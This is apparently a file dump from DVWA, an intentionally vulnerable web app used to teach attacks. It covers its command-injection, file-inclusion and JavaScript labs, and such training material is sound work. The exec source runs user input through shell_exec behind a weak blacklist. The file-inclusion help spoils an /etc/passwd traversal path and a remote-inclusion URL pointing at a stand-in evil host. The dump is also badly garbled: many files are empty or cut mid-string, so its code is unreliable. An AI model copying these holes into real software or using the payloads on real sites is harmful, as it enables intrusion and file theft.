"content": "{$cmd}\";\r\n\t}\r\n\telse {\r\n\t\t// Ops. Let the user name theres a mistake\r\n\t\t$html .= 'ERROR: You have entered an invalid IP.';\r\n\t}\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/exec/source/low.php", "content": "{$cmd}\";\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/exec/source/medium.php", "content": " '',\r\n\t\t';' => '',\r\n\t);\r\n\r\n\t// Remove any of the characters in the array (blacklist).\r\n\t$target = str_replace( array_keys( $substitutions ), $substitutions, $target );\r\n\r\n\t// Determine OS and execute the ping command.\r\n\tif( stristr( php_uname( 's' ), 'Windows NT' ) ) {\r\n\t\t// Windows\r\n\t\t$cmd = shell_exec( 'ping ' . $target );\r\n\t}\r\n\telse {\r\n\t\t// *nix\r\n\t\t$cmd = shell_exec( 'ping -c 4 ' . $target );\r\n\t}\r\n\r\n\t// Feedback for the end user\r\n\t$html .= \"
{$cmd}\";\r\n}\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/fi/file1.php",
"content": "\r\n\tVulnerability: File Inclusion
\r\n\t\r\n\t\t
\r\n\t\tHello \" . dvwaCurrentUser() . \"
\r\n\t\tYour IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}
\r\n\t\t[back]\r\n\t
\r\n\r\n\tFile 1
\r\n\t\t\r\n\t\tHello \" . dvwaCurrentUser() . \"
\r\n\t\tYour IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}
\r\n\t\t[back]\r\n\t
More Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . \" \r\n\t
Vulnerability: File Inclusion
\r\n\t\r\n\t\t
\r\n\t\t\\\"I needed a password eight characters long so I picked Snow White and the Seven Dwarves.\\\" ~ Nick Helm
\r\n\t\t[back]\t
\r\n\r\n\tFile 2
\r\n\t\t\r\n\t\t\\\"I needed a password eight characters long so I picked Snow White and the Seven Dwarves.\\\" ~ Nick Helm
\r\n\t\t[back]\t
More Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . \" \r\n\t
Vulnerability: File Inclusion
\r\n\t\r\n\t\t
\r\n\t\tWelcome back \" . dvwaCurrentUser() . \"
\r\n\t\tYour IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}
\";\r\nif( array_key_exists( 'HTTP_X_FORWARDED_FOR', $_SERVER )) {\r\n\t$page[ 'body' ] .= \"Forwarded for: \" . $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];\r\n\t$page[ 'body' ] .= \"
\";\r\n}\r\n\t\t$page[ 'body' ] .= \"Your user-agent address is: {$_SERVER[ 'HTTP_USER_AGENT' ]}
\";\r\nif( array_key_exists( 'HTTP_REFERER', $_SERVER )) {\r\n\t\t$page[ 'body' ] .= \"You came from: {$_SERVER[ 'HTTP_REFERER' ]}
\";\r\n}\r\n\t\t$page[ 'body' ] .= \"I'm hosted at: {$_SERVER[ 'HTTP_HOST' ]}
\r\n\t\t[back]\r\n\t
\r\n\r\n\tFile 3
\r\n\t\t\r\n\t\tWelcome back \" . dvwaCurrentUser() . \"
\r\n\t\tYour IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}
\";\r\nif( array_key_exists( 'HTTP_X_FORWARDED_FOR', $_SERVER )) {\r\n\t$page[ 'body' ] .= \"Forwarded for: \" . $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];\r\n\t$page[ 'body' ] .= \"
\";\r\n}\r\n\t\t$page[ 'body' ] .= \"Your user-agent address is: {$_SERVER[ 'HTTP_USER_AGENT' ]}
\";\r\nif( array_key_exists( 'HTTP_REFERER', $_SERVER )) {\r\n\t\t$page[ 'body' ] .= \"You came from: {$_SERVER[ 'HTTP_REFERER' ]}
\";\r\n}\r\n\t\t$page[ 'body' ] .= \"I'm hosted at: {$_SERVER[ 'HTTP_HOST' ]}
\r\n\t\t[back]\r\n\t
More Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . \" \r\n\t
Vulnerability: File Inclusion
\r\n\t\r\n\t\t
\r\n\t\tGood job!
\r\n\t\tThis file isn't listed at all on DVWA. If you are reading this, you did something right ;-)
\r\n\t\t\r\n
\\n\";\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/fi/help/help.php",
"content": "File 4 (Hidden)
\r\n\t\t\r\n\t\tGood job!
\r\n\t\tThis file isn't listed at all on DVWA. If you are reading this, you did something right ;-)
\r\n\t\t\r\n
\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/fi/include.php",
"content": "The PHP function allow_url_include is not enabled.\";\r\n}\r\nif( !ini_get( 'allow_url_fopen' ) ) {\r\n\t$WarningHtml .= \"Help - File Inclusion
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tSome web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server.\r\n\t\t\tAt a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing\r\n\t\t\tthe potential for malicious file execution. \r\n\r\n\t\tIf the file chosen to be included is local on the target machine, it is called \"Local File Inclusion (LFI). But files may also be included on other\r\n\t\t\tmachines, which then the attack is a \"Remote File Inclusion (RFI). \r\n\r\n\t\tWhen RFI is not an option. using another vulnerability with LFI (such as file upload and directory traversal) can often achieve the same effect. \r\n\r\n\t\tNote, the term \"file inclusion\" is not the same as \"arbitrary file access\" or \"file disclosure\". \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tRead all five famous quotes from '../hackable/flags/fi.php' using only the file inclusion. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tThis allows for direct input into one of many PHP functions that will include the content when executing. \r\n\r\n\t\tDepending on the web service configuration will depend if RFI is a possibility. \r\n\t\tSpoiler: LFI: ?page=../../../../../../etc/passwd.\r\n\t\t\tSpoiler: RFI: ?page=http://www.evilsite.com/evil.php.\r\n\r\n\t\t \r\n\r\n\t\t Medium Level\r\n\t\tThe developer has read up on some of the issues with LFI/RFI, and decided to filter the input. However, the patterns that are used, isn't enough. \r\n\t\tSpoiler: LFI: Possible, due to it only cycling through the pattern matching once.\r\n\t\t\tSpoiler: RFI: .\r\n\r\n\t\t \r\n\r\n\t\t High Level\r\n\t\tThe developer has had enough. They decided to only allow certain files to be used. However as there are multiple files with the same basename,\r\n\t\t\tthey use a wildcard to include them all. \r\n\t\tSpoiler: LFI: The filename only has start with a certain value..\r\n\t\t\tSpoiler: RFI: Need to link in another vulnerability, such as file upload.\r\n\r\n\t\t \r\n\r\n\t\t Impossible Level\r\n\t\tThe developer calls it quits and hardcodes only the allowed pages, with there exact filenames. By doing this, it removes all avenues of attack. \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\n\tReference:
\r\n\tReference:
\r\n\tReference:
\r\n\r\nThe PHP function allow_url_fopen is not enabled.
\";\r\n}\r\n\r\n$page[ 'body' ] .= \"\r\n\r\n\t
\\n\";\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/fi/index.php",
"content": "\r\n"
},
{
"path": "vulnerabilities/fi/source/high.php",
"content": "\r\n"
},
{
"path": "vulnerabilities/fi/source/impossible.php",
"content": "\r\n"
},
{
"path": "vulnerabilities/fi/source/low.php",
"content": "\r\n"
},
{
"path": "vulnerabilities/fi/source/medium.php",
"content": "\r\n"
},
{
"path": "vulnerabilities/help.css",
"content": "#low_answer,#medium_answer,#high_answer {\n\tdisplay: none;\n}\n"
},
{
"path": "vulnerabilities/help.js",
"content": "function show_answer(which) {\n\tvar block = document.getElementById(which + \"_answer\");\n\tvar button = document.getElementById(which + \"_button\");\n\tif (block.style.display === \"\" || block.style.display === \"none\") {\n\t\tblock.style.display = \"block\";\n\t\tbutton.innerText = \"Hide Answer\";\n\t} else {\n\t\tblock.style.display = \"none\";\n\t\tbutton.innerText = \"Show Answer\";\n\t}\n}\n"
},
{
"path": "vulnerabilities/javascript/help/help.php",
"content": "Vulnerability: File Inclusion
\r\n\r\n\tThis lab relies on the PHP include and require functions being able to include content from remote hosts. As this is a security risk, PHP have deprecated this in version 7.4 and it will be removed completely in a future version. If this lab is not working correctly for you, check your PHP version and roll back to version 7.4 if you are on a newer version which has lost the feature.
You are running PHP version: \" . phpversion() . \"\r\n\t
\r\n\r\n\t{$WarningHtml}\r\n\r\n\t\r\n\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . \" \r\n\t
\n\t
\n\n\t
\n"
},
{
"path": "vulnerabilities/javascript/index.php",
"content": "Well done!\";\n\t\t\t\t\t} else {\n\t\t\t\t\t\t$message = \"Help - Client Side JavaScript
\n\n\t\">\n\t\t
\n\t\t\n\t\t
\n\t\t
\n\n\tAbout
\n\t\tThe attacks in this section are designed to help you learn about how JavaScript is used in the browser and how it can be manipulated. The attacks could be carried out by just analysing network traffic, but that isn't the point and it would also probably be a lot harder.
\n\n\t\t\n\t\t\n\t\t
Objective
\n\t\tSimply submit the phrase \"success\" to win the level. Obviously, it isn't quite that easy, each level implements different protection mechanisms, the JavaScript included in the pages has to be analysed and then manipulated to bypass the protections.
\n\n\t\t\n\t\t
Low Level
\n\t\tAll the JavaScript is included in the page. Read the source and work out what function is being used to generate the token required to match with the phrase and then call the function manually.
\n\t\tSpoiler: Change the phrase to success and then use the function generate_token() to update the token.\n\n\t\tMedium Level
\n\t\t\n\t\t\tThe JavaScript has been broken out into its own file and then minimized. You need to view the source for the included file and then work out what it is doing. Both Firefox and Chrome have a Pretty Print feature which attempts to reverse the compression and display code in a readable way.\n\t\t
\n\t\tSpoiler: The file uses the setTimeout function to run the do_elsesomething function which generates the token.\n\n\t\tHigh Level
\n\t\t\n\t\t\tThe JavaScript has been obfuscated by at least one engine. You are going to need to step through the code to work out what is useful, what is garbage and what is needed to complete the mission.\n\t\t
\n\t\tSpoiler: If it helps, two packers have been used, the first is from Dan's Tools and the second is the JavaScript Obfuscator Tool.\n\t\tSpoiler 2: This deobfuscation tool seems to work the best on this code deobfuscate javascript.\n\t\tSpoiler 3: This is one way to do it... run the obfuscated JS through a deobfuscation app, intercept the response for the obfuscated JS and swap in the readable version. Work out the flow and you will see three functions that need to be called in order. Call the functions at the right time with the right parameters.\n\n\t\tImpossible Level
\n\t\tYou can never trust the user and have to assume that any code sent to the user can be manipulated or bypassed and so there is no impossible level.
\n\n\t\n\n\t
Reference:
\n\t- \n\t\t\n\t\t\n\t\t\n\t\t\n\t
Invalid token.
\";\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\t\t\t\tcase 'medium':\n\t\t\t\t\tif ($token == strrev(\"XXsuccessXX\")) {\n\t\t\t\t\t\t$message = \"Well done!
\";\n\t\t\t\t\t} else {\n\t\t\t\t\t\t$message = \"Invalid token.
\";\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\t\t\t\tcase 'high':\n\t\t\t\t\tif ($token == hash(\"sha256\", hash(\"sha256\", \"XX\" . strrev(\"success\")) . \"ZZ\")) {\n\t\t\t\t\t\t$message = \"Well done!
\";\n\t\t\t\t\t} else {\n\t\t\t\t\t\t$message = \"Invalid token.
\";\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\t\t\t\tdefault:\n\t\t\t\t\t$vulnerabilityFile = 'impossible.php';\n\t\t\t\t\tbreak;\n\t\t\t}\n\t\t} else {\n\t\t\t$message = \"You got the phrase wrong.
\";\n\t\t}\n\t} else {\n\t\t$message = \"Missing phrase or token.
\";\n\t}\n}\n\nif ( dvwaSecurityLevelGet() == \"impossible\" ) {\n$page[ 'body' ] = <<Vulnerability: JavaScript Attacks
\n\n\t\n\t\n\t>2]|=s[M]<>2]|=r<>2]|=(2t|(r>>6))<>2]|=(R|(r&V))<=2E){l[i>>2]|=(2D|(r>>12))<>2]|=(R|((r>>6)&V))<>2]|=(R|(r&V))<>2]|=(2X|(r>>18))<>2]|=(R|((r>>12)&V))<>2]|=(R|((r>>6)&V))<>2]|=(R|(r&V))<=1k){k.1C=l[16];k.1A=i-1k;k.1W();k.1L=1d}z{k.1A=i}}p(k.L>4r){k.2i+=k.L/2H<<0;k.L=k.L%2H}A\\x20k};N.Q.1s=w(){p(k.1U){A}k.1U=1d;q\\x20l=k.l,i=k.2u;l[16]=k.1C;l[i>>2]|=2w[i&3];k.1C=l[16];p(i>=4q){p(!k.1L){k.1W()}l[0]=k.1C;l[16]=l[1]=l[2]=l[3]=l[4]=l[5]=l[6]=l[7]=l[8]=l[9]=l[10]=l[11]=l[12]=l[13]=l[14]=l[15]=0}l[14]=k.2i<<3|k.L>>>29;l[15]=k.L<<3;k.1W()};N.Q.1W=w(){q\\x20a=k.C,b=k.B,c=k.E,d=k.F,e=k.J,f=k.I,g=k.H,h=k.D,l=k.l,j,1a,1b,1j,v,1f,1h,1B,1Z,1V,1D;1g(j=16;j<1k;++j){v=l[j-15];1a=((v>>>7)|(v<<25))^((v>>>18)|(v<<14))^(v>>>3);v=l[j-2];1b=((v>>>17)|(v<<15))^((v>>>19)|(v<<13))^(v>>>10);l[j]=l[j-16]+1a+l[j-7]+1b<<0}1D=b&c;1g(j=0;j<1k;j+=4){p(k.2j){p(k.x){1B=4m;v=l[0]-4n;h=v-4o<<0;d=v+4p<<0}z{1B=4v;v=l[0]-4w;h=v-4G<<0;d=v+4D<<0}k.2j=1O}z{1a=((a>>>2)|(a<<30))^((a>>>13)|(a<<19))^((a>>>22)|(a<<10));1b=((e>>>6)|(e<<26))^((e>>>11)|(e<<21))^((e>>>25)|(e<<7));1B=a&b;1j=1B^(a&c)^1D;1h=(e&f)^(~e&g);v=h+1b+1h+K[j]+l[j];1f=1a+1j;h=d+v<<0;d=v+1f<<0}1a=((d>>>2)|(d<<30))^((d>>>13)|(d<<19))^((d>>>22)|(d<<10));1b=((h>>>6)|(h<<26))^((h>>>11)|(h<<21))^((h>>>25)|(h<<7));1Z=d&a;1j=1Z^(d&b)^1B;1h=(h&e)^(~h&f);v=g+1b+1h+K[j+1]+l[j+1];1f=1a+1j;g=c+v<<0;c=v+1f<<0;1a=((c>>>2)|(c<<30))^((c>>>13)|(c<<19))^((c>>>22)|(c<<10));1b=((g>>>6)|(g<<26))^((g>>>11)|(g<<21))^((g>>>25)|(g<<7));1V=c&d;1j=1V^(c&a)^1Z;1h=(g&h)^(~g&e);v=f+1b+1h+K[j+2]+l[j+2];1f=1a+1j;f=b+v<<0;b=v+1f<<0;1a=((b>>>2)|(b<<30))^((b>>>13)|(b<<19))^((b>>>22)|(b<<10));1b=((f>>>6)|(f<<26))^((f>>>11)|(f<<21))^((f>>>25)|(f<<7));1D=b&c;1j=1D^(b&d)^1V;1h=(f&g)^(~f&h);v=e+1b+1h+K[j+3]+l[j+3];1f=1a+1j;e=a+v<<0;a=v+1f<<0}k.C=k.C+a<<0;k.B=k.B+b<<0;k.E=k.E+c<<0;k.F=k.F+d<<0;k.J=k.J+e<<0;k.I=k.I+f<<0;k.H=k.H+g<<0;k.D=k.D+h<<0};N.Q.1e=w(){k.1s();q\\x20C=k.C,B=k.B,E=k.E,F=k.F,J=k.J,I=k.I,H=k.H,D=k.D;q\\x201e=m[(C>>28)&o]+m[(C>>24)&o]+m[(C>>20)&o]+m[(C>>16)&o]+m[(C>>12)&o]+m[(C>>8)&o]+m[(C>>4)&o]+m[C&o]+m[(B>>28)&o]+m[(B>>24)&o]+m[(B>>20)&o]+m[(B>>16)&o]+m[(B>>12)&o]+m[(B>>8)&o]+m[(B>>4)&o]+m[B&o]+m[(E>>28)&o]+m[(E>>24)&o]+m[(E>>20)&o]+m[(E>>16)&o]+m[(E>>12)&o]+m[(E>>8)&o]+m[(E>>4)&o]+m[E&o]+m[(F>>28)&o]+m[(F>>24)&o]+m[(F>>20)&o]+m[(F>>16)&o]+m[(F>>12)&o]+m[(F>>8)&o]+m[(F>>4)&o]+m[F&o]+m[(J>>28)&o]+m[(J>>24)&o]+m[(J>>20)&o]+m[(J>>16)&o]+m[(J>>12)&o]+m[(J>>8)&o]+m[(J>>4)&o]+m[J&o]+m[(I>>28)&o]+m[(I>>24)&o]+m[(I>>20)&o]+m[(I>>16)&o]+m[(I>>12)&o]+m[(I>>8)&o]+m[(I>>4)&o]+m[I&o]+m[(H>>28)&o]+m[(H>>24)&o]+m[(H>>20)&o]+m[(H>>16)&o]+m[(H>>12)&o]+m[(H>>8)&o]+m[(H>>4)&o]+m[H&o];p(!k.x){1e+=m[(D>>28)&o]+m[(D>>24)&o]+m[(D>>20)&o]+m[(D>>16)&o]+m[(D>>12)&o]+m[(D>>8)&o]+m[(D>>4)&o]+m[D&o]}A\\x201e};N.Q.2U=N.Q.1e;N.Q.1G=w(){k.1s();q\\x20C=k.C,B=k.B,E=k.E,F=k.F,J=k.J,I=k.I,H=k.H,D=k.D;q\\x202b=[(C>>24)&u,(C>>16)&u,(C>>8)&u,C&u,(B>>24)&u,(B>>16)&u,(B>>8)&u,B&u,(E>>24)&u,(E>>16)&u,(E>>8)&u,E&u,(F>>24)&u,(F>>16)&u,(F>>8)&u,F&u,(J>>24)&u,(J>>16)&u,(J>>8)&u,J&u,(I>>24)&u,(I>>16)&u,(I>>8)&u,I&u,(H>>24)&u,(H>>16)&u,(H>>8)&u,H&u];p(!k.x){2b.4A((D>>24)&u,(D>>16)&u,(D>>8)&u,D&u)}A\\x202b};N.Q.27=N.Q.1G;N.Q.2R=w(){k.1s();q\\x201w=O\\x20Z(k.x?28:32);q\\x201i=O\\x204x(1w);1i.1p(0,k.C);1i.1p(4,k.B);1i.1p(8,k.E);1i.1p(12,k.F);1i.1p(16,k.J);1i.1p(20,k.I);1i.1p(24,k.H);p(!k.x){1i.1p(28,k.D)}A\\x201w};w\\x201P(G,x,1v){q\\x20i,T=1c\\x20G;p(T===\\x272p\\x27){q\\x20L=[],W=G.W,M=0,r;1g(i=0;i>6));L[M++]=(R|(r&V))}z\\x20p(r<2A||r>=2E){L[M++]=(2D|(r>>12));L[M++]=(R|((r>>6)&V));L[M++]=(R|(r&V))}z{r=2C+(((r&23)<<10)|(G.1Q(++i)&23));L[M++]=(2X|(r>>18));L[M++]=(R|((r>>12)&V));L[M++]=(R|((r>>6)&V));L[M++]=(R|(r&V))}}G=L}z{p(T===\\x271n\\x27){p(G===2q){1u\\x20O\\x201t(1l)}z\\x20p(1y&&G.1J===Z){G=O\\x202r(G)}z\\x20p(!1z.1K(G)){p(!1y||!Z.1N(G)){1u\\x20O\\x201t(1l)}}}z{1u\\x20O\\x201t(1l)}}p(G.W>1k){G=(O\\x20N(x,1d)).S(G).27()}q\\x201F=[],2e=[];1g(i=0;i<1k;++i){q\\x20b=G[i]||0;1F[i]=4z^b;2e[i]=4y^b}N.1I(k,x,1v);k.S(2e);k.1F=1F;k.2c=1d;k.1v=1v}1P.Q=O\\x20N();1P.Q.1s=w(){N.Q.1s.1I(k);p(k.2c){k.2c=1O;q\\x202W=k.27();N.1I(k,k.x,k.1v);k.S(k.1F);k.S(2W);N.Q.1s.1I(k)}};q\\x20X=2a();X.1q=X;X.1H=2a(1d);X.1q.2V=2f();X.1H.2V=2f(1d);p(2G){2g.X=X}z{Y.1q=X.1q;Y.1H=X.1H;p(2s){2l(w(){A\\x20X})}}})();w\\x202y(e){1g(q\\x20t=\\x22\\x22,n=e.W-1;n>=0;n--)t+=e[n];A\\x20t}w\\x202J(t,y=\\x224B\\x22){1m.1o(\\x221M\\x22).1r=1q(1m.1o(\\x221M\\x22).1r+y)}w\\x202B(e=\\x224E\\x22){1m.1o(\\x221M\\x22).1r=1q(e+1m.1o(\\x221M\\x22).1r)}w\\x202K(a,b){1m.1o(\\x221M\\x22).1r=2y(1m.1o(\\x222F\\x22).1r)}1m.1o(\\x222F\\x22).1r=\\x22\\x22;4u(w(){2B(\\x224M\\x22)},4N);1m.1o(\\x224P\\x22).4Q(\\x224R\\x22,2J);2K(\\x223O\\x22,44);','||||||||||||||||||||this|blocks|HEX_CHARS||0x0F|if|var|code|message||0xFF|t1|function|is224||else|return|h1|h0|h7|h2|h3|key|h6|h5|h4||bytes|index|Sha256|new|method|prototype|0x80|update|type|SHIFT|0x3f|length|exports|root|ArrayBuffer|||||||||||s0|s1|typeof|true|hex|t2|for|ch|dataView|maj|64|ERROR|document|object|getElementById|setUint32|sha256|value|finalize|Error|throw|sharedMemory|buffer|obj|ARRAY_BUFFER|Array|start|ab|block|bc|OUTPUT_TYPES|oKeyPad|digest|sha224|call|constructor|isArray|hashed|token|isView|false|HmacSha256|charCodeAt|WINDOW|crypto|create|finalized|cd|hash|outputType|Buffer|da||||0x3ff||||array|||createMethod|arr|inner|process|iKeyPad|createHmacMethod|module|notString|hBytes|first|createHmacOutputMethod|define|createOutputMethod|algorithm|NODE_JS|string|null|Uint8Array|AMD|0xc0|lastByteIndex|0x800|EXTRA|createHash|do_something|nodeMethod|0xd800|token_part_2|0x10000|0xe0|0xe000|phrase|COMMON_JS|4294967296|window|token_part_3|token_part_1|WEB_WORKER|self|require|eval|nodeWrap|versions|arrayBuffer|JS_SHA256_NO_NODE_JS|undefined|toString|hmac|innerHash|0xf0|0xa2bfe8a1|0xc24b8b70||0xa81a664b||0x92722c85|0x81c2c92e|0xc76c51a3|0x53380d13|0x766a0abb|0x4d2c6dfc|0x650a7354|0x748f82ee|0x84c87814|0x78a5636f|0x682e6ff3|0x8cc70208|0x2e1b2138|0xa4506ceb|0x90befffa|0xbef9a3f7|0x5b9cca4f|0x4ed8aa4a|0x106aa070|0xf40e3585|0xd6990624|0x19a4c116|0x1e376c08|0x391c0cb3|0x34b0bcb5|0x2748774c|0xd192e819|0x0fc19dc6|32768|128|8388608|2147483648|split|0x428a2f98|0x71374491|0x59f111f1|0x3956c25b|0xe9b5dba5|0xb5c0fbcf|0123456789abcdef|JS_SHA256_NO_ARRAY_BUFFER|is|invalid|input|strict|use|JS_SHA256_NO_WINDOW|ABCD|amd|JS_SHA256_NO_COMMON_JS|global|node|0x923f82a4|0xab1c5ed5|0x983e5152|0xa831c66d|0x76f988da|0x5cb0a9dc|0x4a7484aa|0xb00327c8|0xbf597fc7|0x14292967|0x06ca6351||0xd5a79147|0xc6e00bf3|0x2de92c6f|0x240ca1cc|0x550c7dc3|0x72be5d74|0x243185be|0x12835b01|0xd807aa98|0x80deb1fe|0x9bdc06a7|0xc67178f2|0xefbe4786|0xe49b69c1|0xc19bf174|0x27b70a85|0x3070dd17|300032|1413257819|150054599|24177077|56|4294967295|0x5be0cd19|while|setTimeout|704751109|210244248|DataView|0x36|0x5c|push|ZZ|Object|143694565|YY|0x1f83d9ab|1521486534|0x367cd507|0xc1059ed8|0xffc00b31|0x68581511|0x64f98fa7|XX|300|0x9b05688c|send|addEventListener|click|utf8|0xbefa4fa4|0xf70e5939|0x510e527f|0xbb67ae85|0x6a09e667|0x3c6ef372|0xa54ff53a|JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW','split'];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};eval(function(d,e,f,g,h,i){h=function(j){return(j0x23?String[b('0x0')](j+0x1d):j[b('0x1')](0x24));};if(!''[b('0x2')](/^/,String)){while(f--){i[h(f)]=g[f]||h(f);}g=[function(k){if('wpA'!==b('0x3')){return i[k];}else{while(f--){i[k(f)]=g[f]||k(f);}g=[function(l){return i[l];}];k=function(){return b('0x4');};f=0x1;}}];h=function(){return b('0x4');};f=0x1;};while(f--){if(g[f]){if(b('0x5')===b('0x6')){return i[h];}else{d=d[b('0x2')](new RegExp('\\x5cb'+h(f)+'\\x5cb','g'),g[f]);}}}return d;}(b('0x7'),0x3e,0x137,b('0x8')[b('0x9')]('|'),0x0,{}));\n"
},
{
"path": "vulnerabilities/javascript/source/high.php",
"content": "';\n?>\n"
},
{
"path": "vulnerabilities/javascript/source/high_unobfuscated.js",
"content": "/**\n * [js-sha256]{@link https://github.com/emn178/js-sha256}\n *\n * @version 0.9.0\n * @author Chen, Yi-Cyuan [emn178@gmail.com]\n * @copyright Chen, Yi-Cyuan 2014-2017\n * @license MIT\n */\n/*jslint bitwise: true */\n(function () {\n 'use strict';\n\n var ERROR = 'input is invalid type';\n var WINDOW = typeof window === 'object';\n var root = WINDOW ? window : {};\n if (root.JS_SHA256_NO_WINDOW) {\n WINDOW = false;\n }\n var WEB_WORKER = !WINDOW && typeof self === 'object';\n var NODE_JS = !root.JS_SHA256_NO_NODE_JS && typeof process === 'object' && process.versions && process.versions.node;\n if (NODE_JS) {\n root = global;\n } else if (WEB_WORKER) {\n root = self;\n }\n var COMMON_JS = !root.JS_SHA256_NO_COMMON_JS && typeof module === 'object' && module.exports;\n var AMD = typeof define === 'function' && define.amd;\n var ARRAY_BUFFER = !root.JS_SHA256_NO_ARRAY_BUFFER && typeof ArrayBuffer !== 'undefined';\n var HEX_CHARS = '0123456789abcdef'.split('');\n var EXTRA = [-2147483648, 8388608, 32768, 128];\n var SHIFT = [24, 16, 8, 0];\n var K = [\n 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,\n 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,\n 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,\n 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,\n 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,\n 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,\n 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,\n 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2\n ];\n var OUTPUT_TYPES = ['hex', 'array', 'digest', 'arrayBuffer'];\n\n var blocks = [];\n\n if (root.JS_SHA256_NO_NODE_JS || !Array.isArray) {\n Array.isArray = function (obj) {\n return Object.prototype.toString.call(obj) === '[object Array]';\n };\n }\n\n if (ARRAY_BUFFER && (root.JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW || !ArrayBuffer.isView)) {\n ArrayBuffer.isView = function (obj) {\n return typeof obj === 'object' && obj.buffer && obj.buffer.constructor === ArrayBuffer;\n };\n }\n\n var createOutputMethod = function (outputType, is224) {\n return function (message) {\n return new Sha256(is224, true).update(message)[outputType]();\n };\n };\n\n var createMethod = function (is224) {\n var method = createOutputMethod('hex', is224);\n if (NODE_JS) {\n method = nodeWrap(method, is224);\n }\n method.create = function () {\n return new Sha256(is224);\n };\n method.update = function (message) {\n return method.create().update(message);\n };\n for (var i = 0; i < OUTPUT_TYPES.length; ++i) {\n var type = OUTPUT_TYPES[i];\n method[type] = createOutputMethod(type, 